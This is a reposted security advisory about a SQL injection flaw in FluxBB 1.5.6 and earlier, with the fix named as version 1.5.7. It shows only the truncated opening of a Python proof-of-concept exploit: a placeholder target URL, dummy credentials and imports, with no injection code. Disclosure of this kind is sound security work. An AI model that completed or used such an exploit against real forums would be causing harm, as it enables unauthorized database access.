FluxBB <= 1.5.6 SQL Injection

November 21, 2014 007admin Leave a comment

Posted by secthrowaway on Nov 21

FluxBB version 1.5.6 and below suffers from a SQL injection vulnerability.

Solution: update to FluxBB 1.5.7

Working, automated PoC is attached.
#!/usr/bin/env python
# Friday, November 21, 2014 – secthrowaway () safe-mail net
# FluxBB <= 1.5.6 SQL Injection
# make sure that your IP is reachable

url = ‘http://target.tld/forum/'
user = ‘user’ # dummy account
pwd = ‘test’

import urllib, sys, smtpd, asyncore,…

007 Software

FluxBB <= 1.5.6 SQL Injection

Leave a Reply Cancel reply

Software and Security Information